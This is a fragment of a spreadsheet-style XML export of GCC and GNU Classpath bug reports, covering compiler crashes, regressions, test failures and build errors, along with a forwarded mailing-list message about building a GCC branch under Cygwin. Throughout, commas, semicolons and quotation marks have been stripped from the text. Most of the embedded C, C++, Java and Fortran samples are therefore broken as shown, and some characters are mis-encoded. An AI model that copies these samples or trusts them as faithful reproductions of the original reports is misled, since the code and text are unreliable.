In file included from /home/fate/ffmpeg/libavcodec/h264.c:8139:
/home/fate/ffmpeg/libavcodec/svq3.c: In function â€˜svq3_decode_frameâ€™:
/home/fate/ffmpeg/libavcodec/svq3.c:890: internal compiler error: in referenced_var_lookup at tree-dfa.c:563
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Attached is the h264.i file generated when adding -save-temps to the compiler command line. I find that I can trigger the compiler error with this command:
/home/fate/cc/64/gcc-144657-20090305/bin/gcc -c h264.i -O3 -o h264.o
The -O3 is necessary for the error no error when omitting it.</t>
  </si>
  <si>
    <t>GCC-8425</t>
  </si>
  <si>
    <t>[ssa branch]Fwd: [Introspector-developers] Build instructions for the cywin ssa branch</t>
  </si>
  <si>
    <t xml:space="preserve"> Dear Joe
 Would you be so kind as to run the ssa-branch against
 the linked file here
 under cygwin they are segfaulting.
 http://introspector.sourceforge.net/cygwin/del_op.ii
 The two bugs that seem to be with the
 -fdumptranslationunit command. 
 Segfaults in the compiler.
 floatformat will go away if you say -save-temps strangely enough.
 very odd that other one is occuring in the first builds of
 floatformat.c
 /gcc/i686-pc-cygwin/libiberty/floatformat.c
 see my descriptions below
 --- James Michael DuPont  wrote:
 &gt; From James Michael DuPont Fri Nov  1 08:16:54 2002
 &gt; To: introspector-developers@lists.sourceforge.net
 &gt; Subject: [Introspector-developers] Build instructions for the cywin
 &gt; ssa branch
 &gt; Here are the steps to build the cygwin gcc with the introspector
 &gt; patches
 &gt; 
 &gt; 
 &gt; 0. Getting the sources 
 &gt; cvs -d:pserver:anoncvs@subversions.gnu.org:/cvsroot/gcc login
 &gt; # password is empty
 &gt; cvs -d:pserver:anoncvs@subversions.gnu.org:/cvsroot/gcc co -r
 &gt; tree-ssa-20020619-branch gcc
 &gt; 
 &gt; 0.0.1 Patch :
 &gt; http://introspector.sourceforge.net/cygwin/ssa-branch-patch.txt
 &gt; 
 &gt; 0.1 Configure make 
 &gt; 
 &gt; ---------------------------------------------------------------------
 &gt; 1. hacking libjava configure 
 &gt; 
 &gt; In the libjava/configure : 
 &gt; I hacked the test for the java thread model.
 &gt; 
 &gt; echo $ac_n checking for thread model used by GCC... $ac_c 1&gt;&amp;6
 &gt; echo configure:3165: checking for thread model used by GCC &gt;&amp;5
 &gt; #THREADS=`$CC -v 2&gt;&amp;1 | sed -n 's/^Thread model: //p'`
 &gt; THREADS=none
 &gt; --------------------------------------------------------------------
 &gt; 2. Hacking libmudflap
 &gt; 
 &gt; For LibMudFlap 
 &gt; I added this file for the libmudflap execinfo.h
 &gt; /* 
 &gt; This was added by mdupont
 &gt; 
 &gt;    This library is free software you can redistribute it and/or it
 &gt;    under the terms of the GNU Lesser General Public License as
 &gt;    published by the Free Software Foundation either version 2.1 of
 &gt;    the License or (at your option) any later version.
 &gt; 
 &gt;    This library is distributed in the hope that it will be useful
 &gt; but
 &gt;    WITHOUT ANY WARRANTY without even the implied warranty of
 &gt;    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 &gt;    Lesser General Public License for more details.
 &gt; 
 &gt;    You should have received a copy of the GNU Lesser General Public
 &gt;    License along with this library see the file COPYING.LIB.  If
 &gt; not
 &gt;    write to the Free Software Foundation Inc. 59 Temple Place
 &gt; Suite
 &gt;    330 Boston MA 02111-1307 USA. */
 &gt; 
 &gt; #ifndef _EXECINFO_H
 &gt; #define _EXECINFO_H
 &gt; 
 &gt; int backtrace(int int)
 &gt; int backtrace_symbols(int int)
 &gt; 
 &gt; #endif
 &gt; 
 &gt; --------------------------------------------------------------------
 &gt; 3. The standard make did not build libgc or libjava
 &gt; these need to be built separatly
 &gt; 
 &gt; 4. you can debug by adding these commands to the compiler :
 &gt; -fdump-translation-unit -g  -save-temps  --verbose
 &gt; then you can extract the sources.
 &gt; 
 &gt; 4.1 The dumper crashes on the following file
 &gt; and will need to be debugged. 
 &gt; /gcc/i686-pc-cygwin/libiberty/floatformat.c
 &gt; 
 &gt; To get the commands
 &gt; rm floatformat.o 
 &gt; make floatformat.o &gt; command.sh
 &gt; extract that add -fdump-translation-unit -g  --verbose
 &gt; 
 &gt; BUT DONT ADD -save-temps it you add this the error does not happen
 &gt; 
 &gt; /cygdrive/c/development/testing/gcc/gcc/gcc/xgcc
 &gt; -B/cygdrive/c/development/testing/gcc/gcc/gcc/
 &gt; -B/usr/local/i686-pc-cygwin/bin/ -B/usr/local/i686-pc-cygwin/lib/
 &gt; -isystem /usr/local/i686-pc-cygwin/include -c -DHAVE_CONFIG_H -O2 -g
 &gt; -O2 -I. -I./../../include  -W -Wall -Wtraditional -pedantic
 &gt; floatformat.c -fdump-translation-unit -g  --verbose -o floatformat.o
 &gt; 
 &gt; The command line that crashed this was  :
 &gt;  /cygdrive/c/development/testing/gcc/gcc/gcc/cc1.exe -quiet -v -I.
 &gt; -I./../../include -iprefix
 &gt;
 /cygdrive/c/development/testing/gcc/gcc/gcc/../lib/gcc-lib/i686-pc-cygwin/3.4-tree-ssa/
 &gt; -isystem /cygdrive/c/development/testing/gcc/gcc/gcc/include -isystem
 &gt; /usr/local/i686-pc-cygwin/bin/include -isystem
 &gt; /usr/local/i686-pc-cygwin/lib/include -D__GNUC__=3 -D__GNUC_MINOR__=4
 &gt; -D__GNUC_PATCHLEVEL__=0 -D__CYGWIN32__ -D__CYGWIN__ -Dunix -D__unix__
 &gt; -D__unix -isystem /usr/local/include -idirafter
 &gt; /usr/local/i686-pc-cygwin/include -idirafter /usr/include -idirafter
 &gt; /usr/local/i686-pc-cygwin/include/w32api -idirafter
 &gt; /usr/include/w32api
 &gt; -DHAVE_CONFIG_H -isystem /usr/local/i686-pc-cygwin/include
 &gt; floatformat.c -quiet -dumpbase floatformat.c -auxbase-strip
 &gt; floatformat.o -g -g -O2 -O2 -W -Wall -Wtraditional -pedantic -version
 &gt; -fdump-translation-unit -o
 &gt; /cygdrive/d/DOCUME~1/mdupont/LOCALS~1/Temp/ccJGy9eG.s
 &gt; 
 &gt; Here are the versbose output of the command :
 &gt; http://introspector.sourceforge.net/cygwin/floatformat.bug
 &gt; 
 &gt; 4.2 the dumper crashed on the following files
 &gt; /gcc/i686-pc-cygwin/libstdc++-v3/libsupc++/del_op.cc
 &gt; 
 &gt; this command reproduces the crash : 
 &gt; /cygdrive/c/development/testing/gcc/gcc/gcc/cc1plus.exe
 &gt; -fpreprocessed
 &gt; del_op.ii -quiet -dumpbase del_op.cc -auxbase-strip del_op.o -g -g
 &gt; -O2
 &gt; -Wall -Wno-format -W -Wwrite-strings -Winline -version
 &gt; -fno-implicit-templates -fdiagnostics-show-location=once
 &gt; -ffunction-sections -fdata-sections -fdump-translation-unit -o
 &gt; del_op.s
 &gt; 
 &gt; The file is located here 
 &gt; http://introspector.sourceforge.net/cygwin/del_op.ii
 &gt; 
 &gt; can someone else try compiling this
 &gt; With a standard gcc 3.2 and the -fdump-translation-unit
 &gt; and the gcc saa branch?
 &gt; 
 &gt; Thanks
 &gt; 
 &gt; mike
 &gt; 
 &gt; =====
 &gt; James Michael DuPont
 &gt; http://introspector.sourceforge.net/
 &gt; _______________________________________________
 &gt; Introspector-developers mailing list
 &gt; Introspector-developers@lists.sourceforge.net
 &gt; https://lists.sourceforge.net/lists/listinfo/introspector-developers
 =====
 James Michael DuPont
 http://introspector.sourceforge.net/
 __________________________________________________
 Do you Yahoo!?
 HotJobs - Search new jobs daily now
 http://hotjobs.yahoo.com/
Release:
unknown</t>
  </si>
  <si>
    <t>mdupont777</t>
  </si>
  <si>
    <t>GCC-8503</t>
  </si>
  <si>
    <t>[3.2 regression] strange behaviour of function types</t>
  </si>
  <si>
    <t>The example code attached behaves strangely with function types basically template argument deduction finds cv-qualified reference or pointer to function overloads rather than the non-cv qualified version. Since cv-qualifiers are illegal on function types this is particular annoying (in fact gcc emits a warning about this).  template partial specializations behave in the same way - and this is currently causing a problem for boost's type traits code.
Release:
gcc-3.2
Environment:
Suse Linux 7.0</t>
  </si>
  <si>
    <t>CLASSPATH-25233</t>
  </si>
  <si>
    <t>Layout problems with JPanel inside JPanel</t>
  </si>
  <si>
    <t>In the testcase attached the JTextField doesn't show up when it is inside a JPanel p1 which is inside a JPanel p2 when all of the following:
- p2 uses BoxLayout
- p1 uses either BoxLayout or BorderLayout
- p1 has a border set
Run the testcase it shows 6 JFrames and in 2 of them the textfield doesn't show up.  On the JDK all 6 are displayed properly.</t>
  </si>
  <si>
    <t>GCC-44294</t>
  </si>
  <si>
    <t>[4.6 regression] FAIL: g++.dg/abi/bitfield12.C</t>
  </si>
  <si>
    <t>On Linux/x86-64 revision 159912 gave
FAIL: g++.dg/abi/bitfield12.C  (test for warnings line 3)
Revision 159867 is good.</t>
  </si>
  <si>
    <t>GCC-935</t>
  </si>
  <si>
    <t>potimization broken for : conversion : intmax_t -&gt; double -&gt; intmax_t</t>
  </si>
  <si>
    <t>I  reproduce this bug with the last experimental gcc version (20001120).
With large integer (which hasnot an exact double representation) and optimization  the conversion from intmax_t to double and double to intmax_t assumes that there are no conversion. The optimization should take care about this conversion. I add the keyword volatile but it doesn't do anything.
Example of run :
[bdl@localhost user]$ gcc -O0 toto.c -o toto
[bdl@localhost user]$ ./toto
v=2305843009213693952
v=2305843009213693953
l&gt;l1
v=2305843009213693951
l&lt;l1
[bdl@localhost user]$ gcc -O2 toto.c -o toto
[bdl@localhost user]$ ./toto
v=2305843009213693952
v=2305843009213693953
v=2305843009213693951
Release:
2.95.3
Environment:
Linux localhost.localdomain 2.2.15-4mdk #4 mer sep 20 21:02:27 CEST 2000
i586 unknown
How-To-Repeat:
You should only compile with -O0 and after -O3 this program.
#include 
#include 
void  LONGLONG22DBL(intmax_t l)
{
 double d1 d2
 volatile intmax_t l1
 d1 = l
 d2 = d1
 l1 = d1
 if ( l&lt;l1 )
 {
   printf(l&lt;l1\n)
 }
 else if ( l&gt;l1 )
 {
  printf(l&gt;l1\n)
 }
}
int main()
{
 intmax_t v=1
 v &lt;&lt;=61
 printf(v=%PRIiMAX\nv)
 LONGLONG22DBL(v)
 v+=1
 printf(v=%PRIiMAX\nv)
 LONGLONG22DBL(v)
 v-=2
 printf(v=%PRIiMAX\nv)
 LONGLONG22DBL(v)
 return 0
}</t>
  </si>
  <si>
    <t>amgastineau</t>
  </si>
  <si>
    <t>GCC-42114</t>
  </si>
  <si>
    <t>c99-stdint test fails for ptrdiff test</t>
  </si>
  <si>
    <t>Test gcc.dg/c99-stdint-1.c checks for range of__PTRDIFF_TYPE__ and fails for avr target.
test_misc_limits (void)
{
  CHECK_SIGNED_LIMITS_2(__PTRDIFF_TYPE__ PTRDIFF_MIN PTRDIFF_MAX -65535L 65535L)
On AVR pointers and integers are 16bit. 
INTPTR_MIN =-32768
INTPTR_MAX = 32767
UINTPTR_MAX = 65535U
__PTRDIFF_MAX__ is set by gcc at 32767 and so stdint.h gives PTRDIFF_MAX 32767 and PTRDIFF_MIN -32768
I am not sure why minimum range limits are applied in this test or if test/gcc/target is wrong.</t>
  </si>
  <si>
    <t>GCC-50327</t>
  </si>
  <si>
    <t>[4.7 Regression] Front-end optimization generates wrong code for BLAS's srotmg</t>
  </si>
  <si>
    <t>Created attachment 25227
Netlib BLAS's srotmg.f  (== lapack-3.3.1/BLAS/SRC/srotmg.f)
Compiling BLAS' srotmg.f with -ffrontend-optimize causes an endless loop:
$ gfortran -ffrontend-optimize  -c srotmg.f gfortran -O0 test.f90 srotmg.o \
  &amp;&amp; ./a.out
  CALLING: SROTMG
Without it works:
$ gfortran -fno-frontend-optimize  -c srotmg.f gfortran -O0 test.f90 srotmg.o \
  &amp;&amp; ./a.out
  CALLING: SROTMG
  DONE CALLING: SROTMG
FAILING: 2011-09-08 2011-08-25-r178053 05-28-r174379 2011-05-10 
WORKING: 2010-09-28-r164677  (with -O3 -ffrontend-optimize didn't exist yet)
Seemingly also working: Current 4.6 branch.
implicit none
real DTEMP(9)
EXTERNAL          SROTMG
DTEMP(1) = 2.00000003E-10
DTEMP(2) = 3.99999991E-02
DTEMP(3) = 100000.000
DTEMP(4) = 10.0000000
DTEMP(5) = 0.00000000
WRITE (**)' CALLING: SROTMG'
CALL SROTMG(DTEMP(1)DTEMP(2)DTEMP(3)DTEMP(4)DTEMP(5))
WRITE (**)' DONE CALLING: SROTMG'
end</t>
  </si>
  <si>
    <t>GCC-45872</t>
  </si>
  <si>
    <t>[4.5 Regression] java/net/natVMInetAddress.cc:42:52: error: declaration of C function 'int gethostname(char* int)' conflicts</t>
  </si>
  <si>
    <t>Bootstrapping 4.5 revision 164915 on x86_64-apple-darwin10.4 fails with
libtool: compile:  /opt/gcc/4.5_build/./gcc/xgcc -shared-libgcc -B/opt/gcc/4.5_build/./gcc -nostdinc++ -L/opt/gcc/4.5_build/x86_64-apple-darwin10/libstdc++-v3/src -L/opt/gcc/4.5_build/x86_64-apple-darwin10/libstdc++-v3/src/.libs -B/opt/gcc/gcc4.5/x86_64-apple-darwin10/bin/ -B/opt/gcc/gcc4.5/x86_64-apple-darwin10/lib/ -isystem /opt/gcc/gcc4.5/x86_64-apple-darwin10/include -isystem /opt/gcc/gcc4.5/x86_64-apple-darwin10/sys-include -DHAVE_CONFIG_H -I. -I../../../4.5_work/libjava -I./include -I./gcj -I../../../4.5_work/libjava -Iinclude -I../../../4.5_work/libjava/include -I../../../4.5_work/libjava/classpath/include -Iclasspath/include -I../../../4.5_work/libjava/classpath/native/fdlibm -I../../../4.5_work/libjava/../boehm-gc/include -I../boehm-gc/include -I../../../4.5_work/libjava/libltdl -I../../../4.5_work/libjava/libltdl -I../../../4.5_work/libjava/.././libjava/../gcc -I../../../4.5_work/libjava/../libffi/include -I../libffi/include -I/opt/sw64/include -fno-rtti -fnon-call-exceptions -fdollars-in-identifiers -Wswitch-enum -D_FILE_OFFSET_BITS=64 -fomit-frame-pointer -Wextra -Wall -D_GNU_SOURCE -DPREFIX=\/opt/gcc/gcc4.5\ -DTOOLEXECLIBDIR=\/opt/gcc/gcc4.5/lib\ -DJAVA_HOME=\/opt/gcc/gcc4.5\ -DBOOT_CLASS_PATH=\/opt/gcc/gcc4.5/share/java/libgcj-4.5.2.jar\ -DJAVA_EXT_DIRS=\/opt/gcc/gcc4.5/share/java/ext\ -DGCJ_ENDORSED_DIRS=\/opt/gcc/gcc4.5/share/java/gcj-endorsed\ -DGCJ_VERSIONED_LIBDIR=\/opt/gcc/gcc4.5/lib/gcj-4.5.2-11\ -DPATH_SEPARATOR=\:\ -DECJ_JAR_FILE=\\ -DLIBGCJ_DEFAULT_DATABASE=\/opt/gcc/gcc4.5/lib/gcj-4.5.2-11/classmap.db\ -DLIBGCJ_DEFAULT_DATABASE_PATH_TAIL=\gcj-4.5.2-11/classmap.db\ -g -O2 -MT java/net/natVMInetAddress.lo -MD -MP -MF java/net/.deps/natVMInetAddress.Tpo -c java/net/natVMInetAddress.cc  -fno-common -DPIC -o java/net/.libs/natVMInetAddress.o
java/net/natVMInetAddress.cc:42:52: error: declaration of C function 'int gethostname(char* int)' conflicts with
/usr/include/unistd.h:455:6: error: previous declaration 'int gethostname(char* size_t)' here
make[3]: *** [java/net/natVMInetAddress.lo] Error 1
make[3]: *** Waiting for unfinished jobs....
make[2]: *** [all-recursive] Error 1
make[1]: *** [all-target-libjava] Error 2
make: *** [all] Error 2
Note that this step passes with -m32.</t>
  </si>
  <si>
    <t>GCC-7903</t>
  </si>
  <si>
    <t>[arm-thumb] About -fpic</t>
  </si>
  <si>
    <t xml:space="preserve"> aGksDQpJIHdhbnQgdG8gZ2VuZXJhdGUgcG9zaXRpb24gaW5kZXBlbmRlbnQgdGh1bWIgZXhlY3V0
 YWJsZSBjb2RlLA0KYW5kIGxvYWQgUk8oLnRleHQsIC5yb2RhdGEgZXRjKSBhbmQgUlcoLmRhdGEs
 IC5ic3MpIHNlY3Rpb24gaW4gZGlmZmVyZW50IG1lbW9yeSBhcmVhLiAoIGluIEFSTTdURE1JIGVu
 di4gKQ0KKCBBdCBlYWNoIGxvYWRpbmcgdGltZSwgdGhlIGRpZmZlcmVuY2UgYmV0d2VlbiBSTyBz
 dGFydCBhZGRyZXNzIGFuZCBSVyBzdGFydCBhZGRyZXNzIGlzIG5vdCBmaXhlZCApDQpUbyBhdm9p
 ZCByb2RhdGEgYWRkcmVzcyByZWZlcmVuY2UgZXJyb3IsIGkgbG9hZGVkICIuZ290IiBzZWN0aW9u
 IG5leHQgdG8gLnRleHQgc2VjdGlvbi4NCkFuZCBzdXJlbHksIGkgZml4ZWQgR09UIGVudHJ5IHdo
 ZW4gbG9hZGluZyBpdC4NCmJ1dCBpIGZvdW5kIGl0IGRpZCBub3QgaGF2ZSBhbnkgInN0YXRpYyIg
 dmFyaWFibGVzIGluIEdPVCBlbnRyeS4NCkl0IHVzZXMgb2Zmc2V0IGZyb20gR09UIGFkZHJlc3Mg
 aW4gY2FzZSBvZiBzdGF0aWMgdmFyaWFibGVzLiANClRoaXMgbWVhbnMgLmdvdCwgLnRleHQuIGFu
 ZCAuZGF0YSBzaG91bGQgYmUgcGxhY2VkIGNvbnRpZ3VvdXNseSwNCkhvdyBjYW4gaSBzb2x2ZSBh
 Ym92ZSBwcm9ibGVtPw0KDQpJIGhvcGUgdGhlIHJlZmVyZW5jZSBmcm9tIC50ZXh0IHRvIFJPKC50
 ZXh0LCAucm9kYXRhKSBhcmVhIHNob3VsZCBiZSBQQyByZWxhdGl2ZSBub3QgR09UIHJlbGF0aXZl
 IG5vciBHT1QgZW50cnkgYmFzZWQsDQphbmQgdGhlIHJlZmVyZW5jZSBmcm9tIC50ZXh0IHRvIFJX
 KC5kYXRhLCAuYnNzIGV0YykgYXJlYSBzaG91bGQgYmUgR09UIGVudHJ5IGJhc2VkLg0KSXMgaXQg
 cG9zc2libGU/DQoNClRoYW5rcyBpbiBhZHZhbmNlLg0KDQoNCiANCiANCg==
Release:
unknown</t>
  </si>
  <si>
    <t>asroot</t>
  </si>
  <si>
    <t>GCC-36425</t>
  </si>
  <si>
    <t>Option -mno-isel not working</t>
  </si>
  <si>
    <t>The command line -mno-isel does not disable isel generation on e500v[12] targets.
Test case is:
int
foo (int x int y)
{
  if (x &lt; y)
    return x
  else
    return y
Compiled with -O2 -mno-isel</t>
  </si>
  <si>
    <t>GCC-2932</t>
  </si>
  <si>
    <t>new operator segfaults for arrays using pthreads on hpux</t>
  </si>
  <si>
    <t>spawning many threads which each allocate new arrays will cause a segmentation fault on HPUX11.  error does not occur using new to allocate non-arrays or with malloc().
Release:
gcc version 2.95.2 19991024 (release)
Environment:
HP-UX 11
How-To-Repeat:
build as:
gcc -o RTT RTT.cpp -lpthread
run ./RTT</t>
  </si>
  <si>
    <t>rob.renfrew</t>
  </si>
  <si>
    <t>GCC-20333</t>
  </si>
  <si>
    <t>[3.4/4.0/4.1 Regression] ICE on invalid code typename outside of a template</t>
  </si>
  <si>
    <t>GCC-3004</t>
  </si>
  <si>
    <t>Accepts illegal code</t>
  </si>
  <si>
    <t>run g++ on a short file get an internal error.
foo.cpp:
  namespace Foo{
     namespace Bar {
         class Baz {
               public: typedef Baz * Ptr } } }
   class Foo::Bar::Baz::Ptr
g++ -c -o foo.o foo.cpp
Release:
g++ 2.95.2
Environment:
Linux 2.2.19
Unformatted:
  at cp/decl.c:5316</t>
  </si>
  <si>
    <t>tjic</t>
  </si>
  <si>
    <t>GCC-27399</t>
  </si>
  <si>
    <t>GCJ permits indexing by final object</t>
  </si>
  <si>
    <t>This compiles:
public class ClassIndex
    implements Comparable
{
    static final ClassIndex x = new ClassIndex ()
    public int compareTo (Object o)
    {
        return 0
    }
    public static void main (String[] args)
    {
        System.out.println (ClassIndex.x)
        byte[] b = new byte[ClassIndex.x]
        System.out.println (Array length:  + b.length)
    }
}
$ gcj -C ClassIndex.java
$ gcj --version
gcj (GCC) 4.1.0 20060304 (Red Hat 4.1.0-3)
Copyright (C) 2006 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.</t>
  </si>
  <si>
    <t>cagney</t>
  </si>
  <si>
    <t>GCC-50943</t>
  </si>
  <si>
    <t>asm goto in templated code causes internal compiler segfaults</t>
  </si>
  <si>
    <t>Created attachment 25675
The code that causes a segfault
I tested the code in mingw-tdm64 4.5.2 4.6.1 and under the mac port for 4.6.1 all with the same result.
$ gcc-fsf-4.6 -v -save-temps main.cpp
Using built-in specs.
COLLECT_GCC=gcc-fsf-4.6
COLLECT_LTO_WRAPPER=/sw/lib/gcc4.6/libexec/gcc/x86_64-apple-darwin11.1.0/4.6.1/lto-wrapper
Target: x86_64-apple-darwin11.1.0
Configured with: ../gcc-4.6.1/configure --prefix=/sw
--prefix=/sw/lib/gcc4.6 --mandir=/sw/share/man
--infodir=/sw/lib/gcc4.6/info
--enable-languages=cc++fortranltoobjcobj-c++java --with-gmp=/sw
--with-libiconv-prefix=/sw --with-ppl=/sw --with-cloog=/sw
--with-mpc=/sw --with-system-zlib --x-includes=/usr/X11R6/include
--x-libraries=/usr/X11R6/lib --program-suffix=-fsf-4.6
--enable-cloog-backend=isl
Thread model: posix
gcc version 4.6.1 (GCC)
COLLECT_GCC_OPTIONS='-mmacosx-version-min=10.7.2' '-v' '-save-temps'
'-mtune=core2'
 /sw/lib/gcc4.6/libexec/gcc/x86_64-apple-darwin11.1.0/4.6.1/cc1plus -E
-quiet -v -D__DYNAMIC__ main.cpp -fPIC -mmacosx-version-min=10.7.2
-mtune=core2 -fpch-preprocess -o main.ii
ignoring nonexistent directory
/sw/lib/gcc4.6/lib/gcc/x86_64-apple-darwin11.1.0/4.6.1/../../../../x86_64-apple-darwin11.1.0/include
#include ... search starts here:
#include  search starts here:
 /sw/lib/gcc4.6/lib/gcc/x86_64-apple-darwin11.1.0/4.6.1/../../../../include/c++/4.6.1
 /sw/lib/gcc4.6/lib/gcc/x86_64-apple-darwin11.1.0/4.6.1/../../../../include/c++/4.6.1/x86_64-apple-darwin11.1.0
 /sw/lib/gcc4.6/lib/gcc/x86_64-apple-darwin11.1.0/4.6.1/../../../../include/c++/4.6.1/backward
 /sw/lib/gcc4.6/lib/gcc/x86_64-apple-darwin11.1.0/4.6.1/include
 /usr/local/include
 /sw/lib/gcc4.6/include
 /sw/lib/gcc4.6/lib/gcc/x86_64-apple-darwin11.1.0/4.6.1/include-fixed
 /usr/include
 /System/Library/Frameworks
 /Library/Frameworks
End of search list.
COLLECT_GCC_OPTIONS='-mmacosx-version-min=10.7.2' '-v' '-save-temps'
'-mtune=core2'
 /sw/lib/gcc4.6/libexec/gcc/x86_64-apple-darwin11.1.0/4.6.1/cc1plus
-fpreprocessed main.ii -fPIC -quiet -dumpbase main.cpp
-mmacosx-version-min=10.7.2 -mtune=core2 -auxbase main -version -o main.s
GNU C++ (GCC) version 4.6.1 (x86_64-apple-darwin11.1.0)
       compiled by GNU C version 4.6.1 GMP version 5.0.2 MPFR version 3.0.1
MPC version 0.9
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU C++ (GCC) version 4.6.1 (x86_64-apple-darwin11.1.0)
       compiled by GNU C version 4.6.1 GMP version 5.0.2 MPFR version 3.0.1
MPC version 0.9
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: b15fbe702f97b74ba102fe17491ae6a1
main.cpp: In function â€˜bool work(int* int) [with T = int]â€™:
main.cpp:15:1: internal compiler error: Segmentation fault: 11
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$ cat main.ii
# 1 main.cpp
# 1 
# 1 
# 1 main.cpp
template
bool work(int* data int bit) {
    asm goto(lock and %0 %1
             jz %l[other]
    : : r(~(1 &lt;&lt; bit)) m(data) : : other)
    return false
other:
    return true
}
int main(int argc char** argv) {
    int data = 2
    work(
    return 0
}</t>
  </si>
  <si>
    <t>dummyddd</t>
  </si>
  <si>
    <t>GCC-646</t>
  </si>
  <si>
    <t>stl map hangs while erasing end()</t>
  </si>
  <si>
    <t>when I tried to erase a map's end iterator
the program hangs. But according Stroustrup's The C++
Programming Language third edition Erasing end()
is harmless. (pp 489) Please see the attached file 
for detail. This problem can be repeated on all associative
containers.
Release:
gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
Environment:
Linux 2.2.14-5.0
How-To-Repeat:
Compile the attached file and run it. It will hang.</t>
  </si>
  <si>
    <t>kzhang</t>
  </si>
  <si>
    <t>GCC-46021</t>
  </si>
  <si>
    <t>3 tree-ssa tests XPASS almost everywhere</t>
  </si>
  <si>
    <t>Three tree-ssa tests started to XPASS on all of my targets between 20100520 and
20100708:
XPASS: gcc.dg/tree-ssa/20031106-3.c scan-tree-dump-times optimized link_error 0
XPASS: gcc.dg/tree-ssa/20040204-1.c scan-tree-dump-times optimized link_error 0
XPASS: gcc.dg/tree-ssa/fre-vce-1.c scan-tree-dump-times fre sv.i 2
If this is expected either the xfail should be removed completely or adapted to
remove that useless testsuite noise.</t>
  </si>
  <si>
    <t>GCC-56635</t>
  </si>
  <si>
    <t>[4.8/4.9 regression] internal compiler error: in find_lattice_value at tree-complex.c:15</t>
  </si>
  <si>
    <t>In file included from /builddir/build/BUILD/gdl-0.9.3/src/datatypes.cpp:67:0:
/builddir/build/BUILD/gdl-0.9.3/src/basic_op.cpp: In function '':
/builddir/build/BUILD/gdl-0.9.3/src/basic_op.cpp:3791:9: internal compiler error: in find_lattice_value at tree-complex.c:151
 #pragma omp parallel if (nEl &gt;= CpuTPOOL_MIN_ELTS &amp;&amp; (CpuTPOOL_MAX_ELTS == 0 || CpuTPOOL_MAX_ELTS &lt;= nEl))
         ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/ccXWRPxa.out file please attach this to your bugreport.
gcc-4.8.0-0.16.fc19.x86_64</t>
  </si>
  <si>
    <t>GCC-19328</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/attr-alias-2.c (test for excess errors)</t>
  </si>
  <si>
    <t>/mnt/gnu/gcc-3.3/gcc/gcc/testsuite/gcc.dg/attr-alias-2.c:7: warning: alias defin
itions not supported in this configuration ignored
/mnt/gnu/gcc-3.3/gcc/gcc/testsuite/gcc.dg/attr-alias-2.c:15: warning: alias defi
nitions not supported in this configuration ignored
UNSUPPORTED: gcc.dg/attr-alias-1.c
Executing on host: /mnt/gnu/gcc-3.3/objdir/gcc/xgcc -B/mnt/gnu/gcc-3.3/objdir/gc
c/ /mnt/gnu/gcc-3.3/gcc/gcc/testsuite/gcc.dg/attr-alias-2.c   -funit-at-a-time
-lm   -o attr-alias-2.exe    (timeout = 300)
/mnt/gnu/gcc-3.3/gcc/gcc/testsuite/gcc.dg/attr-alias-2.c:7: warning: alias defin
itions not supported in this configuration ignored
/mnt/gnu/gcc-3.3/gcc/gcc/testsuite/gcc.dg/attr-alias-2.c:15: warning: alias defi
nitions not supported in this configuration ignored
/usr/ccs/bin/ld: Unsatisfied symbols:
   g1 (first referenced in /var/tmp//ccQynfri.o) (code)
   g2 (first referenced in /var/tmp//ccQynfri.o) (code)
collect2: ld returned 1 exit status
compiler exited with status 1
output is:
/mnt/gnu/gcc-3.3/gcc/gcc/testsuite/gcc.dg/attr-alias-2.c:7: warning: alias defin
itions not supported in this configuration ignored
/mnt/gnu/gcc-3.3/gcc/gcc/testsuite/gcc.dg/attr-alias-2.c:15: warning: alias defi
nitions not supported in this configuration ignored
/usr/ccs/bin/ld: Unsatisfied symbols:
   g1 (first referenced in /var/tmp//ccQynfri.o) (code)
   g2 (first referenced in /var/tmp//ccQynfri.o) (code)
collect2: ld returned 1 exit status
FAIL: gcc.dg/attr-alias-2.c (test for excess errors)
This appears to be a testsuite issue.</t>
  </si>
  <si>
    <t>GCC-55744</t>
  </si>
  <si>
    <t>Use of ebx as output register in inline asm on x86_64 PIC mcmodel=medium</t>
  </si>
  <si>
    <t>When compiling the following with gcc for x86_64-elf-linux with -fPIC (or -fpic) -mcmodel=medium/large the error inconsistent operand constraints in an 'asm' occurs.
#include 
int main()
{
    unsigned int a b
    a = 42
    __asm__ (movl %1 %0 : =b (b) : a (a))
    printf(Result: %d\n b)
    return 0
}
Changing the =b to =c fixes the problem.  As far as I can see from the x86_64 ABI then in PIC mode with medium/large code models the r15 register should be used to store the GOT pointer and rbx has no special meaning (unlike i386 PIC).  Is there an error in the x86_64 machine description file where rbx is erroneously identified as being special in PIC mode?  Or does gcc actually make special use of rbx in this mode?
Regards
John.</t>
  </si>
  <si>
    <t>jncronin</t>
  </si>
  <si>
    <t>GCC-25552</t>
  </si>
  <si>
    <t>[4.0/4.1/4.2 regression] Invalid destructor name accepted in friend declaration</t>
  </si>
  <si>
    <t>The following invalid code snippet is not rejected:
====================
struct A {}
struct B
{
  friend A::~B()
}
====================
The problem appeared in gcc 4.0.0.</t>
  </si>
  <si>
    <t>GCC-41929</t>
  </si>
  <si>
    <t>64-bit null_pointer_deref1 gnat.dg test consumes all available memory</t>
  </si>
  <si>
    <t>Between 20091022 and 20091102 a parallel make check run (both 32 and 64 bit)
on Solaris 11/SPARC started to fail with `Cannot fork: out of memory'.  It turns
out that the null_pointer_deref1 gnat.dg test is the culprit: it grows to 11+ GB
on my test system:
   PID USERNAME  SIZE   RSS STATE  PRI NICE      TIME  CPU PROCESS/NLWP       
 15442 ro         11G 6705M stop    43    0   0:03:16 0.0% null_pointer_de/1
pmap shows that it's all on the heap:
15442:  ./null_pointer_deref1.exe
0000000100000000        120K r-x--  /export/vol/gcc/obj/SunOS-sparc/gcc-4.5.0-20091102/11-gcc/gcc/testsuite/gnat/null_pointer_deref1.exe
